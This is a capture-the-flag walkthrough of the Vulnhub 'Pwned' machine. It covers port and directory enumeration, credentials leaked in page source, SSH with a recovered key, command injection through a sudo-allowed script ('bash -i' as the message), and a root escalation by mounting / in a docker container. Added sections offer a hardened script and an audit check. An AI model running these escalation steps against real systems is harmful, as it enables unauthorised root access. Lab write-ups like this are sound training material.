[VLN] Pwned

Today we are going to hack the Vulnhub machine called Pwned. You can download it from the following link: Pwned

Enumeration


We start with an nmap scan to see which ports are open.

~ > nmap -A -p- 192.168.1.93
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-10 17:04 CEST
Nmap scan report for pwned.home (192.168.1.93)
Host is up (0.0011s latency).
Not shown: 65532 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 fe:cd:90:19:74:91:ae:f5:64:a8:a5:e8:6f:6e:ef:7e (RSA)
|   256 81:32:93:bd:ed:9b:e7:98:af:25:06:79:5f:de:91:5d (ECDSA)
|_  256 dd:72:74:5d:4d:2d:a3:62:3e:81:af:09:51:e0:14:4a (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Pwned....!!
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at 
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.09 seconds
Let's explore port 80 a bit more and see what we find.

~ > gobuster dir -u 192.168.1.93 -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://192.168.1.93
[+] Threads:        10
[+] Wordlist:       /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/07/10 17:27:57 Starting gobuster
===============================================================
/nothing (Status: 301)
/hidden_text (Status: 301)
/server-status (Status: 403)
We find the hidden_text directory. Visiting http://192.168.1.93/hidden_text we see that there is a file, secret.dic, containing:

/hacked
/vanakam_nanba
/hackerman.gif 
/facebook
/whatsapp
/instagram
/pwned
/pwned.com
/pubg 
/cod
/fortnite
/youtube
/kali.org
/hacked.vuln
/users.vuln
/passwd.vuln
/pwned.vuln
/backup.vuln
/.ssh
/root
/home
We download the secret.dic file.

wget http://192.168.1.93/hidden_text/secret.dic
Once it is downloaded, we run gobuster again using secret.dic as the wordlist.

~/ctf/vulnhub/cybersploit > gobuster dir -u http://192.168.1.93 -w secret.dic 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://192.168.1.93
[+] Threads:        10
[+] Wordlist:       secret.dic
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/07/10 17:31:52 Starting gobuster
===============================================================
//pwned.vuln (Status: 301)
===============================================================
2020/07/10 17:31:52 Finished
===============================================================
We see that pwned.vuln shows up. We visit http://192.168.1.93/pwned.vuln/ and in the page source we can see:

//	if (isset($_POST['submit'])) {
//		$un=$_POST['username'];
//		$pw=$_POST['password'];
//
//	if ($un=='ftpuser' && $pw=='B0ss_B!TcH') {
//		echo "welcome"
//		exit();
// }
// else 
//	echo "Invalid creds"
// }
We log in to the FTP server with those credentials (ftpuser/B0ss_B!TcH).

~/ctf/vulnhub/cybersploit > ftp 192.168.1.93
Connected to 192.168.1.93.
220 (vsFTPd 3.0.3)
Name (192.168.1.93:sml): ftpuser
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 0        0            4096 Jul 10 12:47 share
226 Directory send OK.
ftp>
We explore the share folder on the FTP server and download its contents.

ftp> cd share
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 0        0            2602 Jul 09 15:05 id_rsa
-rw-r--r--    1 0        0              75 Jul 09 17:41 note.txt
226 Directory send OK.
ftp> get id_rsa
local: id_rsa remote: id_rsa
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for id_rsa (2602 bytes).
226 Transfer complete.
2602 bytes received in 0.00 secs (3.8592 MB/s)
ftp> get note.txt
local: note.txt remote: note.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for note.txt (75 bytes).
226 Transfer complete.
75 bytes received in 0.00 secs (61.8078 kB/s)
We see the id_rsa file, which is probably a private key. We give it the appropriate permissions...

~ > chmod 600 id_rsa 
We also have the note.txt file:

~ > cat note.txt
Wow you are here
ariana won't happy about this note
sorry ariana :(
We see that the user "ariana" is mentioned in the note. We use the user ariana and the id_rsa key to see if we can get a shell over ssh.

Low Shell



~ > ssh -i id_rsa ariana@192.168.1.93
Linux pwned 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Jul 10 13:03:23 2020 from 192.168.18.70
ariana@pwned:~$

user1.txt



ariana@pwned:~$ cat user1.txt
congratulations you Pwned ariana 
Here is your user flag
fb8d98be1265dd88bac522e1b2182140
Try harder.need become root
Let's check whether we can use sudo as the user ariana, and what we are allowed to run...

ariana@pwned:~$ sudo -l
Matching Defaults entries for ariana on pwned:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User ariana may run the following commands on pwned:
    (selena) NOPASSWD: /home/messenger.sh
Good, we can run a script as the user selena. Let's look at the script...

ariana@pwned:~$ cat /home/messenger.sh
#!/bin/bash
clear
echo "Welcome to linux.messenger "
		echo ""
users=$(cat /etc/passwd | grep home |  cut -d/ -f 3)
		echo ""
echo "$users"
		echo ""
read -p "Enter username to send message : " name 
		echo ""
read -p "Enter message for $name :" msg
		echo ""
echo "Sending message to $name "

$msg 2> /dev/null
		echo ""
echo "Message sent to $name :) "
		echo ""
We run it and enter "bash -i" as the message, since the script executes the message text as a command, to get a shell as "selena" :)

ariana@pwned:~$ sudo -u selena /home/messenger.sh

Welcome to linux.messenger 
ariana:
selena:
ftpuser:

Enter username to send message : bash -i
Enter message for bash -i :bash -i
Sending message to bash -i 
python3 -c 'import pty; pty.spawn("/bin/bash")' # not echoed on screen
selena@pwned:/home/ariana$ id
uid=1001(selena) gid=1001(selena) groups=1001(selena),115(docker)
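The root cause here is the line "$msg 2> /dev/null" in messenger.sh: whatever the caller types as the message is executed as a command under the sudo target user. The following is an added example, not the machine's own messenger.sh, showing how the same script could be written so that user input is only ever treated as data: the recipient is checked against an allow-list derived from the account database, and the message is written with printf into a spool directory instead of being run. The spool path SPOOL_DIR (defaulting to /tmp/messenger-spool so it runs unprivileged) and the PASSWD_FILE override are assumptions for the example, not part of the original box.

```shell
#!/bin/sh
# Added example (not the machine's messenger.sh): a hardened rewrite that
# never executes user input. Assumptions for the example: the spool root
# SPOOL_DIR and the PASSWD_FILE the allow-list is built from.

SPOOL_DIR="${SPOOL_DIR:-/tmp/messenger-spool}"
PASSWD_FILE="${PASSWD_FILE:-/etc/passwd}"

# list_users: print login names whose home directory is under /home,
# reading the passwd file field by field instead of "cat | grep | cut".
list_users() {
    while IFS=: read -r name pw uid gid gecos home shell; do
        case "$home" in
            /home/*) printf '%s\n' "$name" ;;
        esac
    done < "$PASSWD_FILE"
}

# validate_user: succeed only if NAME is made of portable login-name
# characters, does not start with '-', and is in list_users.
validate_user() {
    name="$1"
    case "$name" in
        ''|-*|*[!A-Za-z0-9._-]*) return 1 ;;
    esac
    list_users | grep -qx -- "$name"
}

# deliver_message: append MSG as plain text to the recipient's spool file.
# The message is an argument to printf, so it is stored, never evaluated.
deliver_message() {
    name="$1"
    msg="$2"
    validate_user "$name" || return 1
    mkdir -p "$SPOOL_DIR" || return 1
    printf '%s\n' "$msg" >> "$SPOOL_DIR/$name.msg"
}

# Interactive front-end with the same prompts as the original script.
main() {
    echo "Welcome to linux.messenger"
    list_users
    printf 'Enter username to send message : '
    read -r name
    if ! validate_user "$name"; then
        echo "Unknown user" >&2
        exit 1
    fi
    printf 'Enter message for %s : ' "$name"
    read -r msg
    if deliver_message "$name" "$msg"; then
        echo "Message sent to $name :)"
    else
        echo "Could not deliver message" >&2
        exit 1
    fi
}

# Only prompt when explicitly asked, so the functions can be sourced and
# exercised non-interactively.
if [ "${MESSENGER_INTERACTIVE:-0}" = 1 ]; then
    main
fi
```

Run it with MESSENGER_INTERACTIVE=1 to get the prompts. With this version, entering "bash -i" as the recipient is rejected by validate_user, and entering it as the message simply writes the string "bash -i" to the recipient's spool file.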

user2.txt



selena@pwned:~$ cat user2.txt 
711fdfc6caad532815a440f7f295c176

You are near to me. you found selena too.
Try harder to catch me
We see that the user selena belongs to the docker group. Let's see which images are available...

selena@pwned:~$ docker images
REPOSITORY          TAG                 IMAGE ID            CREATED             SIZE
privesc             latest              09ae39f0f8fc        4 days ago          88.3MB
<none>              <none>              e13ad046d435        4 days ago          88.3MB
alpine              latest              a24bb4013296        5 weeks ago         5.57MB
debian              wheezy              10fcec6d95c4        16 months ago       88.3MB
We mount the system root / inside a container from the "privesc" image and run /bin/sh. Membership in the docker group is enough for this, because the daemon runs as root and will bind-mount any host path we ask for.

selena@pwned:~$ docker run -v /:/mnt/fuckfs -ti 09ae39f0f8fc /bin/sh
Now all that is left is to look in the /root folder.
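Both steps of the privilege escalation on this box come from configuration an administrator can spot in advance: a NOPASSWD sudoers rule pointing at a script that a non-root user can tamper with, and an account in the docker group, which is root-equivalent because of the bind mount just shown. The following is an added audit script, not part of this write-up or the machine, that flags both. It reads the group and sudoers data from GROUP_FILE and SUDOERS_FILE (assumed overrides so it can be run against constructed samples; they default to /etc/group and /etc/sudoers).

```shell
#!/bin/sh
# Added example (not from the original page): flag docker-group members
# and NOPASSWD sudo targets that are not root-owned or are group/world
# writable. GROUP_FILE and SUDOERS_FILE are assumptions for the example.

GROUP_FILE="${GROUP_FILE:-/etc/group}"
SUDOERS_FILE="${SUDOERS_FILE:-/etc/sudoers}"

# docker_group_members: print every member of the docker group, one per line.
docker_group_members() {
    while IFS=: read -r gname gpw gid members; do
        [ "$gname" = docker ] || continue
        printf '%s\n' "$members" | tr ',' '\n' | sed '/^$/d'
    done < "$GROUP_FILE"
}

# nopasswd_rules: print "user runas command" for each rule of the form
#   user HOST=(runas) NOPASSWD: command
nopasswd_rules() {
    sed -n 's/^\([^#][^[:space:]]*\)[[:space:]]*[^=]*=(\([^)]*\))[[:space:]]*NOPASSWD:[[:space:]]*\(.*\)$/\1 \2 \3/p' \
        "$SUDOERS_FILE"
}

# unsafe_sudo_target: succeed if PATH exists and is either not owned by
# root or writable by group or others, i.e. a lower-privileged user could
# change what sudo runs.
unsafe_sudo_target() {
    [ -e "$1" ] || return 1
    find "$1" -maxdepth 0 \( ! -user root -o -perm -g+w -o -perm -o+w \) \
        | grep -q .
}

# audit_findings: one finding per line, nothing when the host is clean.
audit_findings() {
    docker_group_members | while read -r m; do
        printf 'docker-group %s (root-equivalent: can bind-mount / into a container)\n' "$m"
    done
    nopasswd_rules | while read -r user runas cmd; do
        # The command may carry arguments; only the executable path is checked.
        set -- $cmd
        if unsafe_sudo_target "$1"; then
            printf 'tamperable-sudo-target %s may run %s as %s\n' "$user" "$1" "$runas"
        fi
    done
}

# audit: print the findings and return 1 if there is at least one.
audit() {
    findings=$(audit_findings)
    [ -z "$findings" ] && return 0
    printf '%s\n' "$findings"
    return 1
}
```

On the box in this write-up, audit would report selena as a docker-group member and /home/messenger.sh as a NOPASSWD target if that script is not root-owned or is writable by group or others; with the docker group emptied and the rule removed, it returns 0 and prints nothing.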

root.txt



# cd /mnt/fuckfs/root
# ls
root.txt
# cat root.txt
4d4098d64e163d2726959455d046fd7c

You found me. i dont't expect this (◎ . ◎)
I am Ajay (Annlynn) i hacked your server left and this for you.
I trapped Ariana and Selena to takeover your server :)

You Pwned the Pwned congratulations :)
share the screen shot or flags to given contact details for confirmation 
Telegram   https://t.me/joinchat/NGcyGxOl5slf7_Xt0kTr7g
Instgarm   ajs_walker 
Twitter    Ajs_walker

End


And with that we are root on the machine :)